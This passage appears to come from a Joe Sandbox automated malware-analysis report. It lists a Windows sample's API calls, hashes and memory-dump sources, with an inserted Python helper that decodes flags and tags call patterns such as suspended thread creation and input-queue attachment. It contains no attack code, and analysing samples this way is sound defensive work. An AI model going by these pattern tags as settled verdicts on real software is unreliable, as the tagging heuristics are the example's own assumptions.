                                                                  • Opcode Fuzzy Hash: e433c15d401fe04648fa187998619783fb37f3e1a178d0ca850e8c882d9c2726
                                                                  • Instruction Fuzzy Hash: 5B11E47A200241AFDB146F78C844DBA77AAFF45750B50422AF902CB390EF319941C7A4
                                                                  APIs
                                                                  • SendMessageW.USER32(?,00001060,?,00000004), ref: 006B615A
                                                                  • _wcslen.LIBCMT ref: 006B616C
                                                                  • _wcslen.LIBCMT ref: 006B6177
                                                                  • SendMessageW.USER32(?,00001002,00000000,?), ref: 006B62B5
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend_wcslen
                                                                  • String ID:
                                                                  • API String ID: 455545452-0
                                                                  • Opcode ID: 2448baa57807428107bf18663f0039d8a08be6f6578d34a9c511adeb6278a876
                                                                  • Instruction ID: 688ca5bb512f39e81c2949c1cdd7029d5f7bcd88b427eb5a9133eeed3fe306b8
                                                                  • Opcode Fuzzy Hash: 2448baa57807428107bf18663f0039d8a08be6f6578d34a9c511adeb6278a876
                                                                  • Instruction Fuzzy Hash: A611D3B5540219A6DB20DF68CCC4AFF77BEEB15350B14412AFA11D6181EB78C9C5CF61
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f787b82cd6a64b59c2133bad4434c5de19958d13664a71a5a2e4f297d19f2994
                                                                  • Instruction ID: 5c09b030fa3cf844ab6a3bf2cb70dd0d785bc1aed125cdee1bd70cbe819e8300
                                                                  • Opcode Fuzzy Hash: f787b82cd6a64b59c2133bad4434c5de19958d13664a71a5a2e4f297d19f2994
                                                                  • Instruction Fuzzy Hash: BE018FB220A2177EE72126786CD0F67671FDF523BAF301329FD21A52D1EA608C888164
                                                                  APIs
                                                                  • SendMessageW.USER32(?,000000B0,?,?), ref: 00682394
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006823A6
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006823BC
                                                                  • SendMessageW.USER32(?,000000C9,?,00000000), ref: 006823D7
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: MessageSend
                                                                  • String ID:
                                                                  • API String ID: 3850602802-0
                                                                  • Opcode ID: ec9a75a385f95f1e431fd40511cdfd6a496c3ee24fc4edfbff8fd2faef865f31
                                                                  • Instruction ID: f58a8087b5ad03188040a7def21b09df8399cb7641e2e5de4ba5be37fee2bdda
                                                                  • Opcode Fuzzy Hash: ec9a75a385f95f1e431fd40511cdfd6a496c3ee24fc4edfbff8fd2faef865f31
                                                                  • Instruction Fuzzy Hash: 3811397A900229FFEB11ABA4CD95FDDBBB9FB08750F200191EA00B7290D6716E10DB94
                                                                  APIs
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0068EB14
                                                                  • MessageBoxW.USER32(?,?,?,?), ref: 0068EB47
                                                                  • WaitForSingleObject.KERNEL32(00000000,000000FF,?,?,?,?), ref: 0068EB5D
                                                                  • CloseHandle.KERNEL32(00000000,?,?,?,?), ref: 0068EB64
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CloseCurrentHandleMessageObjectSingleThreadWait
                                                                  • String ID:
                                                                  • API String ID: 2880819207-0
                                                                  • Opcode ID: 015b343a46f9db247e4c61b76b0a01d418175c3a54e40132e55892f87234cd2f
                                                                  • Instruction ID: 1b98c09f9a7fcf85cd67ac7ffbe072aeb6686ae09de61e4cc256dd4d4877809a
                                                                  • Opcode Fuzzy Hash: 015b343a46f9db247e4c61b76b0a01d418175c3a54e40132e55892f87234cd2f
                                                                  • Instruction Fuzzy Hash: E71126B6904219BBC701ABA89C05ADF7FAFAB46320F004316F815E3390EA75C9048BA0
                                                                  APIs
                                                                  • CreateThread.KERNEL32(00000000,?,0064D369,00000000,00000004,00000000), ref: 0064D588
                                                                  • GetLastError.KERNEL32 ref: 0064D594
                                                                  • __dosmaperr.LIBCMT ref: 0064D59B
                                                                  • ResumeThread.KERNEL32(00000000), ref: 0064D5B9
                                                                  Similarity
                                                                  • API ID: Thread$CreateErrorLastResume__dosmaperr
                                                                  • String ID:
                                                                  • API String ID: 173952441-0
                                                                  • Opcode ID: 15343255cebe2f8b9c41cb9838a4c10e976ed5406015ecff17ef4f89c25045e8
                                                                  • Instruction ID: d465cebe990d6133d7350f407786ee111183465bbd6156f43d9d7d9292bb2c69
                                                                  • Opcode Fuzzy Hash: 15343255cebe2f8b9c41cb9838a4c10e976ed5406015ecff17ef4f89c25045e8
                                                                  • Instruction Fuzzy Hash: 4E01F972800114BBCB256FA5DC09BAE7BABEF42335F100319F925862E0DF708841C6A1
                                                                  APIs
                                                                  • CreateWindowExW.USER32(?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 006278B1
                                                                  • GetStockObject.GDI32(00000011), ref: 006278C5
                                                                  • SendMessageW.USER32(00000000,00000030,00000000), ref: 006278CF
                                                                  Similarity
                                                                  • API ID: CreateMessageObjectSendStockWindow
                                                                  • String ID:
                                                                  • API String ID: 3970641297-0
                                                                  • Opcode ID: 817ca28266d38aa27f55ed6276e7a83bfe3f3681f1f9c54f9ac974f33f125629
                                                                  • Instruction ID: 6efe6b78d2769c5bc80e91411bc1bebae7f6024aba09e56246f1f565543d8055
                                                                  • Opcode Fuzzy Hash: 817ca28266d38aa27f55ed6276e7a83bfe3f3681f1f9c54f9ac974f33f125629
                                                                  • Instruction Fuzzy Hash: 9311A17250591DBFDF165F90EC58EEA7B6AFF08364F041225FA0456110D7359CA0EFA0
                                                                  APIs
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0065338D,00000364,00000000,00000000,00000000,?,006535FE,00000006,FlsSetValue), ref: 00653418
                                                                  • GetLastError.KERNEL32(?,0065338D,00000364,00000000,00000000,00000000,?,006535FE,00000006,FlsSetValue,006C3260,FlsSetValue,00000000,00000364,?,006531B9), ref: 00653424
                                                                  • LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0065338D,00000364,00000000,00000000,00000000,?,006535FE,00000006,FlsSetValue,006C3260,FlsSetValue,00000000), ref: 00653432
                                                                  Similarity
                                                                  • API ID: LibraryLoad$ErrorLast
                                                                  • String ID:
                                                                  • API String ID: 3177248105-0
                                                                  • Opcode ID: 09d1db542cc34f14d36fb9e9ecfd1108d3edb291b5eed20f908560b692f1c492
                                                                  • Instruction ID: 21dc5382e39123e184d36905cf30698cca8da2ca048fa1e37cf054a7f9bebd66
                                                                  • Opcode Fuzzy Hash: 09d1db542cc34f14d36fb9e9ecfd1108d3edb291b5eed20f908560b692f1c492
                                                                  • Instruction Fuzzy Hash: 09018872611232ABC7224B799C449967BDAAF05FE2F214620FD06D7341D731DE46C6E0
                                                                  APIs
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0068B69A,?,00008000), ref: 0068BA8B
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0068B69A,?,00008000), ref: 0068BAB0
                                                                  • QueryPerformanceCounter.KERNEL32(?,?,?,?,?,?,?,?,?,0068B69A,?,00008000), ref: 0068BABA
                                                                  • Sleep.KERNEL32(00000000,?,?,?,?,?,?,?,?,0068B69A,?,00008000), ref: 0068BAED
                                                                  Similarity
                                                                  • API ID: CounterPerformanceQuerySleep
                                                                  • String ID:
                                                                  • API String ID: 2875609808-0
                                                                  • Opcode ID: ca7570482ff7fd891d7c72ca110b5c5707f5958b24987a3866acb97187f00da6
                                                                  • Instruction ID: 1be94e826371a28b73c7b8da0aaee2f37d5559deaf48fd94fb0f655c487da5e3
                                                                  • Opcode Fuzzy Hash: ca7570482ff7fd891d7c72ca110b5c5707f5958b24987a3866acb97187f00da6
                                                                  • Instruction Fuzzy Hash: 40118E74C00619E7CF04EFA8E9486EEBB7AFF09711F101285D541B6280DB705650CBA5
                                                                  APIs
                                                                  • GetWindowRect.USER32(?,?), ref: 006B888E
                                                                  • ScreenToClient.USER32(?,?), ref: 006B88A6
                                                                  • ScreenToClient.USER32(?,?), ref: 006B88CA
                                                                  • InvalidateRect.USER32(?,?,?,?,?,?,?,?,?,?,?,?), ref: 006B88E5
                                                                  Similarity
                                                                  • API ID: ClientRectScreen$InvalidateWindow
                                                                  • String ID:
                                                                  • API String ID: 357397906-0
                                                                  • Opcode ID: 4066ef3cab35eb01bf2a307a9f91fdbbeec2c3eb521a09f7d185db7de9567c35
                                                                  • Instruction ID: d381afe840179644b0e509edff23d44d9f1e1b4765fe7e44d792a259235f4996
                                                                  • Opcode Fuzzy Hash: 4066ef3cab35eb01bf2a307a9f91fdbbeec2c3eb521a09f7d185db7de9567c35
                                                                  • Instruction Fuzzy Hash: B61144B9D00209EFDB41CF98C8849EEBBF9FB08314F505156E915E3210E735AA94CF50
                                                                  APIs
                                                                  • SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00683712
                                                                  • GetWindowThreadProcessId.USER32(?,00000000), ref: 00683723
                                                                  • GetCurrentThreadId.KERNEL32 ref: 0068372A
                                                                  • AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00683731
                                                                  Similarity
                                                                  • API ID: Thread$AttachCurrentInputMessageProcessSendTimeoutWindow
                                                                  • String ID:
                                                                  • API String ID: 2710830443-0
                                                                  • Opcode ID: 9f407446422970728caa5b12be731b09c56c29cc66432b1fd6c241e8fde62923
                                                                  • Instruction ID: 2505e011b0230b9b6a1de8762255ffbcc7a556d513a4b6186854ecb2c028101d
                                                                  • Opcode Fuzzy Hash: 9f407446422970728caa5b12be731b09c56c29cc66432b1fd6c241e8fde62923
                                                                  • Instruction Fuzzy Hash: 42E092F11012347BDB2027A29C4DEEB7F6EDF46FA1F400215F206D6180FAA0C980C2B0
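The three call blocks above are easier to read once their flag arguments are decoded: 00000004 in CreateThread's fifth slot (ref 0064D588) is CREATE_SUSPENDED, 00000800 in LoadLibraryExW's third slot (ref 00653418) is LOAD_LIBRARY_SEARCH_SYSTEM32, and 00000002 with 00001388 in SendMessageTimeoutW (ref 00683712) is SMTO_ABORTIFHUNG with a 5000 ms timeout. The Python below is an added triage helper, not part of the Joe Sandbox report or of the sample: it parses records in the report's own "Api.Module(args), ref: addr" form, decodes those flags, groups calls by address proximity and tags recognisable sequences. The sample records are copied from the listing above; the grouping window, the tag names, and the reading of a suspended-then-resumed thread with an intervening __dosmaperr call as the C runtime's own thread-start helper (rather than an injection stager) are the example's assumptions.

```python
import re
from collections import defaultdict

# Constructed sample input: "APIs" records copied from the report above, one
# call per line in the report's "<Api>.<Module>(<args>), ref: <addr>" form.
SAMPLE_RECORDS = """\
CreateThread.KERNEL32(00000000,?,0064D369,00000000,00000004,00000000), ref: 0064D588
GetLastError.KERNEL32 ref: 0064D594
__dosmaperr.LIBCMT ref: 0064D59B
ResumeThread.KERNEL32(00000000), ref: 0064D5B9
LoadLibraryExW.KERNEL32(00000000,00000000,00000800,00000364,00000000,00000000,?,0065338D,00000364,00000000,00000000,00000000,?,006535FE,00000006,FlsSetValue), ref: 00653418
GetLastError.KERNEL32(?,0065338D,00000364,00000000,00000000,00000000,?,006535FE,00000006,FlsSetValue,006C3260,FlsSetValue,00000000,00000364,?,006531B9), ref: 00653424
LoadLibraryExW.KERNEL32(00000000,00000000,00000000,?,0065338D,00000364,00000000,00000000,00000000,?,006535FE,00000006,FlsSetValue,006C3260,FlsSetValue,00000000), ref: 00653432
SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00683712
GetWindowThreadProcessId.USER32(?,00000000), ref: 00683723
GetCurrentThreadId.KERNEL32 ref: 0068372A
AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00683731
"""

# Flag constants from the Windows SDK headers.
CREATE_SUSPENDED = 0x4                # CreateThread dwCreationFlags
LOAD_LIBRARY_SEARCH_SYSTEM32 = 0x800  # LoadLibraryExW dwFlags
SMTO_ABORTIFHUNG = 0x2                # SendMessageTimeoutW fuFlags

# Index of the flag parameter per callee. The report prints more stack slots
# than the callee takes (return addresses such as 0065338D appear), so only
# the leading slots are the real arguments.
FLAG_FIELDS = {
    "CreateThread": (4, {CREATE_SUSPENDED: "CREATE_SUSPENDED"}),
    "LoadLibraryExW": (2, {LOAD_LIBRARY_SEARCH_SYSTEM32: "LOAD_LIBRARY_SEARCH_SYSTEM32"}),
    "SendMessageTimeoutW": (4, {SMTO_ABORTIFHUNG: "SMTO_ABORTIFHUNG"}),
}

CALL_RE = re.compile(
    r"^(?P<api>[\w@?$]+)\.(?P<mod>\w+)"
    r"(?:\((?P<args>[^)]*)\),)? ref: (?P<ref>[0-9A-Fa-f]{8})$"
)

def parse_arg(tok):
    """8-hex-digit stack slots become ints; '?' (unresolved) and names stay."""
    tok = tok.strip()
    return int(tok, 16) if re.fullmatch(r"[0-9A-Fa-f]{8}", tok) else tok

def parse_records(text):
    """Parse report lines into dicts with api, module, args and ref (int)."""
    records = []
    for line in filter(None, (ln.strip() for ln in text.splitlines())):
        m = CALL_RE.match(line)
        if not m:
            raise ValueError(f"unrecognised record: {line!r}")
        args = m.group("args")
        records.append({
            "api": m.group("api"),
            "module": m.group("mod"),
            "args": [parse_arg(a) for a in args.split(",")] if args else [],
            "ref": int(m.group("ref"), 16),
        })
    return records

def decode_flags(rec):
    """Symbolic names of the bits set in the call's flag parameter, if known."""
    if rec["api"] not in FLAG_FIELDS:
        return []
    idx, names = FLAG_FIELDS[rec["api"]]
    args = rec["args"]
    if idx >= len(args) or not isinstance(args[idx], int):
        return []
    return [name for bit, name in names.items() if args[idx] & bit]

def group_by_function(records, window=0x100):
    """Split where consecutive ref addresses are more than `window` bytes apart;
    the report lists each function's calls together, so this recovers the
    per-function blocks (the window size is an assumption)."""
    groups = []
    for rec in records:
        if groups and rec["ref"] - groups[-1][-1]["ref"] <= window:
            groups[-1].append(rec)
        else:
            groups.append([rec])
    return groups

def tags(group):
    """Tag a call block by the sequences it forms."""
    apis = [r["api"] for r in group]
    flags = defaultdict(set)
    for r in group:
        flags[r["api"]].update(decode_flags(r))
    found = set()
    if "CREATE_SUSPENDED" in flags["CreateThread"] and "ResumeThread" in apis:
        # Create suspended, map the error, resume: with the CRT's __dosmaperr in
        # between this is the runtime's thread-start helper; without it a
        # suspended-then-resumed thread deserves a closer look (stagers do this).
        found.add("crt-thread-start" if "__dosmaperr" in apis else "suspended-thread-resume")
    if apis.count("LoadLibraryExW") >= 2 and "LOAD_LIBRARY_SEARCH_SYSTEM32" in flags["LoadLibraryExW"]:
        found.add("guarded-dll-load-with-fallback")  # System32-only first, plain load as fallback
    if "SMTO_ABORTIFHUNG" in flags["SendMessageTimeoutW"]:
        found.add("hung-window-probe")   # WM_NULL with SMTO_ABORTIFHUNG tests responsiveness
    if "AttachThreadInput" in apis:
        found.add("input-queue-attach")  # joins another thread's input queue
    return sorted(found)

if __name__ == "__main__":
    for block in group_by_function(parse_records(SAMPLE_RECORDS)):
        print(f"{block[0]['ref']:08X}: {', '.join(tags(block)) or 'other'}")
        for rec in block:
            print(f"  {rec['api']} {decode_flags(rec)}")
```

Run stand-alone, the script prints one line per recovered block with its tags and one line per call with the decoded flag names; the address-proximity grouping is a heuristic and should be replaced by the report's own block boundaries when the records are taken from the full page rather than from a flat list.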
                                                                  APIs
                                                                    • Part of subcall function 00621F2D: ExtCreatePen.GDI32(?,?,00000000,00000000,00000000,?,00000000), ref: 00621F87
                                                                    • Part of subcall function 00621F2D: SelectObject.GDI32(?,00000000), ref: 00621F96
                                                                    • Part of subcall function 00621F2D: BeginPath.GDI32(?), ref: 00621FAD
                                                                    • Part of subcall function 00621F2D: SelectObject.GDI32(?,00000000), ref: 00621FD6
                                                                  • MoveToEx.GDI32(?,00000000,00000000,00000000), ref: 006B92E3
                                                                  • LineTo.GDI32(?,?,?), ref: 006B92F0
                                                                  • EndPath.GDI32(?), ref: 006B9300
                                                                  • StrokePath.GDI32(?), ref: 006B930E
                                                                  Similarity
                                                                  • API ID: Path$ObjectSelect$BeginCreateLineMoveStroke
                                                                  • String ID:
                                                                  • API String ID: 1539411459-0
                                                                  • Opcode ID: 7266a3f56b4224cd3451fc05d06197691d6a70f54ebb8c9545a8834005391ff3
                                                                  • Instruction ID: dc68918f418f6577f8c60c4a2bbb968bab26a767a7ff255afaa90b2506216f82
                                                                  • Opcode Fuzzy Hash: 7266a3f56b4224cd3451fc05d06197691d6a70f54ebb8c9545a8834005391ff3
                                                                  • Instruction Fuzzy Hash: 2CF05471005265BBDB126F54AC0EFDE3F6B9F0A320F049100FA11651E1C7B555A1DFA5
                                                                  APIs
                                                                  • GetSysColor.USER32(00000008), ref: 006221BC
                                                                  • SetTextColor.GDI32(?,?), ref: 006221C6
                                                                  • SetBkMode.GDI32(?,00000001), ref: 006221D9
                                                                  • GetStockObject.GDI32(00000005), ref: 006221E1
                                                                  Similarity
                                                                  • API ID: Color$ModeObjectStockText
                                                                  • String ID:
                                                                  • API String ID: 4037423528-0
                                                                  • Opcode ID: e220a91d2bd749d1c0c2fa6a19d68d0e423ac7c653817569067a9cda5c4cf687
                                                                  • Instruction ID: 29efb0b23d3b39b7664493789e691173fa8f33df89d99ae65fb761375c8e43ff
                                                                  • Opcode Fuzzy Hash: e220a91d2bd749d1c0c2fa6a19d68d0e423ac7c653817569067a9cda5c4cf687
                                                                  • Instruction Fuzzy Hash: 81E06571240650BADB215F78BC09BE93B52AB12335F048319F7B6581E0D77146809B10
                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 0067EC36
                                                                  • GetDC.USER32(00000000), ref: 0067EC40
                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0067EC60
                                                                  • ReleaseDC.USER32(?), ref: 0067EC81
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: 7898ed8a1cf907c82829a5b18767c31c40bed6bdec75e5ef7ea60eb770ef7d09
                                                                  • Instruction ID: 5936a1168c15a81eb6591f50d5f90a34b595a19cf6a12faca89707d8fa32ebfc
                                                                  • Opcode Fuzzy Hash: 7898ed8a1cf907c82829a5b18767c31c40bed6bdec75e5ef7ea60eb770ef7d09
                                                                  • Instruction Fuzzy Hash: 09E01AB4C00205DFCB41AFA0D908A5DBBB2EB08310F108559E84AE7250E73959829F10
                                                                  APIs
                                                                  • GetDesktopWindow.USER32 ref: 0067EC4A
                                                                  • GetDC.USER32(00000000), ref: 0067EC54
                                                                  • GetDeviceCaps.GDI32(00000000,0000000C), ref: 0067EC60
                                                                  • ReleaseDC.USER32(?), ref: 0067EC81
                                                                  Similarity
                                                                  • API ID: CapsDesktopDeviceReleaseWindow
                                                                  • String ID:
                                                                  • API String ID: 2889604237-0
                                                                  • Opcode ID: c79f08e87374c6e769f62356d1ed7edfc8334f489cc73e01120c0e2a0cdc5f18
                                                                  • Instruction ID: 5792b2415482532c9cca2ab148ed072ffc32669c770fa0bb15d4ca7056a342e7
                                                                  • Opcode Fuzzy Hash: c79f08e87374c6e769f62356d1ed7edfc8334f489cc73e01120c0e2a0cdc5f18
                                                                  • Instruction Fuzzy Hash: 36E01AB0C00205DFCB409FA0D808A5DBBB2EB08310F108519E849E7250E73959419F10
                                                                  Strings
                                                                  Similarity
                                                                  • API ID: LoadString
                                                                  • String ID: @COM_EVENTOBJ$bnh
                                                                  • API String ID: 2948472770-1815434238
                                                                  • Opcode ID: 01ebf2efbe60ec01c8728adbce4d6e5bacf77ed606c066b3eaff6c20656bd90d
                                                                  • Instruction ID: 8533dcf5e2447df69ef55d7106fb3621979caadb42defd68c9fdc6095892a7ae
                                                                  • Opcode Fuzzy Hash: 01ebf2efbe60ec01c8728adbce4d6e5bacf77ed606c066b3eaff6c20656bd90d
                                                                  • Instruction Fuzzy Hash: 2FF1AD70A087209FD724DF14C881BAAB7E2BF84704F24891DF58A9B361D771EA45DB86
                                                                  APIs
                                                                    • Part of subcall function 006405B2: EnterCriticalSection.KERNEL32(006F170C,?,00000000,?,0062D22A,006F3570,00000001,00000000,?,?,0069F023,?,?,00000000,00000001,?), ref: 006405BD
                                                                    • Part of subcall function 006405B2: LeaveCriticalSection.KERNEL32(006F170C,?,0062D22A,006F3570,00000001,00000000,?,?,0069F023,?,?,00000000,00000001,?,00000001,006F2430), ref: 006405FA
                                                                    • Part of subcall function 0062B329: _wcslen.LIBCMT ref: 0062B333
                                                                    • Part of subcall function 00640413: __onexit.LIBCMT ref: 00640419
                                                                  • __Init_thread_footer.LIBCMT ref: 006A8658
                                                                    • Part of subcall function 00640568: EnterCriticalSection.KERNEL32(006F170C,00000000,?,0062D258,006F3570,006627C9,00000001,00000000,?,?,0069F023,?,?,00000000,00000001,?), ref: 00640572
                                                                    • Part of subcall function 00640568: LeaveCriticalSection.KERNEL32(006F170C,?,0062D258,006F3570,006627C9,00000001,00000000,?,?,0069F023,?,?,00000000,00000001,?,00000001), ref: 006405A5
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
                                                                  • String ID: Variable must be of type 'Object'.$bnh
                                                                  • API String ID: 535116098-1046365367
                                                                  • Opcode ID: a8d134a8fd193a395b744c21457defebc239fa5f93a13ba6ba5b0e1f94f5a3ef
                                                                  • Instruction ID: ef2c9fd627f9a9e0b0a3127e2cb98c35ed0004ca13f4a73e1157f57912250c81
                                                                  • Opcode Fuzzy Hash: a8d134a8fd193a395b744c21457defebc239fa5f93a13ba6ba5b0e1f94f5a3ef
                                                                  • Instruction Fuzzy Hash: A3913574A00208AFDB04EF94D9919ADBBB6EF4A300F14805DF906AB392DB71AE45CF54
                                                                  APIs
                                                                    • Part of subcall function 006241EA: _wcslen.LIBCMT ref: 006241EF
                                                                  • WNetUseConnectionW.MPR(00000000,?,0000002A,00000000,?,?,0000002A,?), ref: 00695919
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: Connection_wcslen
                                                                  • String ID: *$LPT
                                                                  • API String ID: 1725874428-3443410124
                                                                  • Opcode ID: 7580b903af8b49f6fa557f37725250bf3bc10069367a26239b135f1498f2d1a5
                                                                  • Instruction ID: e21dd81245ff5591b6a6b260197c18b9034ad5727ed4aeab0ebbf8397e27f8af
                                                                  • Opcode Fuzzy Hash: 7580b903af8b49f6fa557f37725250bf3bc10069367a26239b135f1498f2d1a5
                                                                  • Instruction Fuzzy Hash: 7E91AF75A00614DFDB15DF54C4C4EAABBF6AF44304F198099E84A9F762C731EE86CB90
                                                                  APIs
                                                                  • OleSetContainedObject.OLE32(?,00000001), ref: 006858AF
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ContainedObject
                                                                  • String ID: 0$o$Container
                                                                  • API String ID: 3565006973-905637992
                                                                  • Opcode ID: fd89cf3b5e88b47e273f223ee50dbee16f668ba274610ce9b843df3a43765900
                                                                  • Instruction ID: b159c64486362772422434bd3be60f0a10d65c25f3bdea0b896cb3ace831fe76
                                                                  • Opcode Fuzzy Hash: fd89cf3b5e88b47e273f223ee50dbee16f668ba274610ce9b843df3a43765900
                                                                  • Instruction Fuzzy Hash: A8813870600601EFDB54DF54C884A6ABBFAFF48715F10866EF94A8B2A1DBB0E841CB50
                                                                  APIs
                                                                  • __startOneArgErrorHandling.LIBCMT ref: 0064E67D
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 0000000C.00000002.2351412504.0000000000621000.00000020.00000001.01000000.00000007.sdmp, Offset: 00620000, based on PE: true
                                                                  • Associated: 0000000C.00000002.2351378629.0000000000620000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006BD000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351482510.00000000006E3000.00000002.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351538424.00000000006ED000.00000004.00000001.01000000.00000007.sdmp
                                                                  • Associated: 0000000C.00000002.2351559897.00000000006F5000.00000002.00000001.01000000.00000007.sdmp
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_12_2_620000_Hc.jbxd
                                                                  Similarity
                                                                  • API ID: ErrorHandling__start
